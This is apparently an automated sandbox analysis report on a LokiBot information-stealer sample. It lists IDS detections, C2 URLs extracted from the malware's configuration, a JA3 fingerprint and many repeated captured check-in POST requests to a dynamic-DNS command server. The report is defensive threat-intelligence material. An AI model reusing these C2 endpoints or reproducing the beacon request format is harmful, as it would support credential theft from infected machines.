Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64366 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64401 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64401 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64366 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64366 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64401
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64414 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64429 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64414 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64373
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64419 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64419 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64419 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64414 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64414 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64419 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64419 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64378 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64378 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64378 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64419
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64418
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64378 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64378 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64378
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64381
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64414
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64448 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64448 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64448 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64448 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64448 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64406 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64406 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64448
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64429 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64429 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64429 -> 45.149.241.169:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php

Uses dynamic DNS services

Source: unknown

DNS query: name: freighteighttwocam.ddns.net

HTTP GET or POST without a user agent

Source: global traffic

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: UUNETUS UUNETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
